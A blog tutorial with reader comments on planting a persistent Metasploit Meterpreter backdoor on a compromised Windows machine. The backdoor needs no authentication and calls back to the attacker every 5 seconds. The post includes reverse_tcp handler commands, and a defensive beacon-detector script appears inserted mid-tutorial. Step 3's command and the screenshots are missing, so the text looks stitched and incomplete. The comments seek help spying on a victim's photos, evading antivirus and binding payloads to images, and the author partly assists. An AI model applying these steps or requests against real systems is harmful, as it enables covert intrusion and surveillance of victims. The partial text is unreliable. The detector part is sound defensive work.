5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

Type : Tutorial

Level : Medium, Advanced

Some people and students ask what we should do after successfully compromising or exploiting a victim.

Some exploits, such as CVE-2010-3962, can make the victim's computer hang when executed. When the computer hangs, some users choose to restart it, and the restart makes the previous exploit ineffective.

What we will do here is maintaining access: leaving ourselves an easier way back into the system later. With this method, if the service you exploited goes down or is patched, you can still regain access to the system for future use.

The Metasploit Persistent Meterpreter Service is what we will use in this tutorial, but be warned: the persistent Meterpreter as set up in this tutorial requires no authentication. This means that anyone who gains access to the port could use your backdoor! This is not a good thing if you are conducting a penetration test, as it could be a significant risk.

Requirements:

1. Backtrack 5 (or other Linux OS)

2. Metasploit Framework 3 (Included in Backtrack 5)

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5:

1. You need to set the payload of your exploit to Meterpreter to use this method.

2. Run persistence -h to view the help list.

3. We will configure our persistent Meterpreter session to wait until a user logs on to the remote system, then try to connect back to our listener every 5 seconds at our IP address on port 8080.

Notice that the script output gives you the command to "remove" the persistent listener when you are done with it. Be sure to make note of it so you don’t leave an unauthenticated backdoor on the system.

Explanation:

-U : start the backdoor when a user logs in to the system

-i : try to connect back every 5 seconds

-p : connect back on port 8080

-r : connect back to the specified IP address
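The behaviour configured in step 3 (a fixed 5-second reconnect interval to one IP and port) is also what makes this kind of persistence visible to a defender. The following detector is an added example for this article, not part of the original tutorial or of Metasploit: it reads firewall-style connection log lines and flags any source host that repeatedly opens connections to the same destination IP:port at a near-constant interval. The log format and all IP addresses, timestamps and thresholds are constructed for the demo.

```python
"""
Beacon detector for fixed-interval callbacks (added example, not from the
original tutorial). Looks for one source host hitting one destination
IP:port repeatedly with almost no variation in the time between attempts,
which is what a persistent Meterpreter with "-i 5 -p 8080" produces.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log. Format (assumed for this demo):
#   <ISO timestamp> <src_ip> -> <dst_ip>:<dst_port> <event>
# 10.0.0.15 calls back to 10.0.0.5:8080 every 5 seconds (the tutorial's
# settings); 10.0.0.22 is ordinary browsing with irregular timing.
SAMPLE_LOG = """\
2012-03-01T08:00:00 10.0.0.15 -> 10.0.0.5:8080 SYN
2012-03-01T08:00:05 10.0.0.15 -> 10.0.0.5:8080 SYN
2012-03-01T08:00:10 10.0.0.15 -> 10.0.0.5:8080 SYN
2012-03-01T08:00:15 10.0.0.15 -> 10.0.0.5:8080 SYN
2012-03-01T08:00:20 10.0.0.15 -> 10.0.0.5:8080 SYN
2012-03-01T08:00:25 10.0.0.15 -> 10.0.0.5:8080 SYN
2012-03-01T08:00:02 10.0.0.22 -> 203.0.113.10:443 SYN
2012-03-01T08:00:41 10.0.0.22 -> 203.0.113.10:443 SYN
2012-03-01T08:03:17 10.0.0.22 -> 203.0.113.10:443 SYN
2012-03-01T08:00:07 10.0.0.22 -> 10.0.0.9:445 SYN
"""


def parse_log(text):
    """Parse log lines into (timestamp, src_ip, dst_ip, dst_port) tuples.
    Lines that do not match the expected five-field layout are skipped."""
    records = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[2] != "->":
            continue
        ts = datetime.fromisoformat(fields[0])
        dst_ip, dst_port = fields[3].rsplit(":", 1)
        records.append((ts, fields[1], dst_ip, int(dst_port)))
    return records


def find_beacons(records, min_hits=5, max_jitter=1.0):
    """Group connections by (src, dst_ip, dst_port) and flag groups with at
    least min_hits attempts whose inter-arrival times vary by no more than
    max_jitter seconds (population standard deviation).

    Returns {(src, dst_ip, dst_port): {"count": n, "interval": seconds}}."""
    by_flow = defaultdict(list)
    for ts, src, dst_ip, dst_port in records:
        by_flow[(src, dst_ip, dst_port)].append(ts)

    hits = {}
    for flow, times in by_flow.items():
        if len(times) < min_hits:
            continue
        times.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if pstdev(deltas) <= max_jitter:
            hits[flow] = {"count": len(times), "interval": mean(deltas)}
    return hits


if __name__ == "__main__":
    for (src, dst, port), info in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"{src} -> {dst}:{port}: {info['count']} connections "
              f"every {info['interval']:.1f}s (possible persistent callback)")
```

The thresholds are deliberately simple: a real deployment would run this over a sliding window and tune min_hits and max_jitter to the traffic in question. Because the persistence script used in this tutorial retries at a constant interval with no jitter, the interval check alone separates it from the irregular browsing flow in the sample; flows with too few attempts, like the 10.0.0.22 traffic, are not reported.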

4. To make sure that it works, reboot the remote system and set up our payload handler.

msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit

[*] Started reverse handler on
[*] Starting the payload handler...

5. When the remote user restarts the system and logs in again, you should see something like this (we have to wait until the backdoor is executed by the remote system):

Let's see what happens on the remote host:

There is an established connection between the attacker and the remote host.

Hope it's useful 🙂


Blogger at hacking-tutorial.com. Loves PHP, offensive security and the web.
Contact him at me[-at-]vishnuvalentino.com
Website: http://www.vishnuvalentino.com

  • Kalai

    Hi friend. I am having a problem with compromising a Win 7 machine.
    When I execute the exploit it stops at:
    [*] Started reverse handler on 
    [*] Starting the payload handler…
    and I waited for hours, but no response. What is the reason? I'm attacking my internal network.
    Here is my code:
    use exploit/multi/handler
    set LHOST ( my IP)
    set LPORT 5555
    set payload windows/meterpreter/reverse_tcp
    show options
    set EndOnSession false
    show options
    set RHOST (target machine ip)
    set RPORT 4321
    show options

    • v4L

      I just saw your message on Facebook and also on your Office Live.
      The "handler" is used to listen for every data that comes to your PC on a specific port. For example, you set your LHOST on 5555, which means that if the victim is successfully compromised by your exploit, they will access your address on that specific port, e.g. your-ip-address:5555, and it will trigger the handler.

  • Gabriel

    Hello, I need your help: how can I download a file, let's say a picture, from the victim computer from this position (meterpreter)? Thank you 🙂

  • r12

    What if the attacker's machine is restarted? Will it be automatically reconnected? (Assuming that the compromised machine is always running.)
    Thank you

    • v4L

      I tried that on Windows XP; yes, it will automatically reconnect.

  • Gabriel

    Let's say the victim has 2 partitions, C: and D: (Windows 7), and I want to see what she has in the computer on D:, like pics and videos. How can I get a list of those things in meterpreter? Thank you very much, you are a great help. Sorry for my bad English.

    • v4L

      You can share the victim's folder and start searching for the photo. Not from meterpreter, though; you should go into the Windows command line.

  • Gabriel

    And let's say the victim runs the exploit.exe for the first time and she has a rotating IP. It would be cool to have a command in meterpreter to copy reverse_tcp again into Windows startup, so every time she opens the PC we have access. Please write a line with that command if you know it. THANK YOU, I owe you a beer.

    • v4L

      I already wrote it above, using meterpreter.

  • Gabriel

    I already wrote it above by using meterpreter
    A keyword or a link to search would be great. Thank you

  • itfun

    I'm just wondering, how can I deploy to many computers, around 10 to 20? Can I monitor all of them at the same time?
    Thank you.

  • Lufe

    Hey there, can I backdoor out from my LAN?

    • v4L


  • Shoaib

    Sir, I am trying to install the backdoor, but it is detected as a "Trojen Dropper:VBS/Swort.A".

    Is there any method or script to successfully install the backdoor on the victim's computer using Backtrack 5 without being detected by anti-virus?

  • Michael

    Dear brother, can you tell me what technique I should use to bind a payload with a *.jpg or *.bmp file? I downloaded a lot of file binders from the internet but they are not working as I want. I need a binder that works properly and that does not change the behaviour of the payload: when the victim clicks my *.jpg, the JPG opens and the payload executes in the background.


    • v4L

      It has been such a long time since I used binding software; maybe you can try searching Google for "silently bind exe and image file".

      • Michael

        Dear, I tried a lot, so many software packages downloaded, but none is working fine. If we run the bound file and it is in executable format, then the image opens and the payload also executes in the background, but if the bound file is in jpg or bmp format then only the image is displayed and the payload will not run.

  • raja

    How can I hack a victim's system over the WAN?

    • v4L

      See here: http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/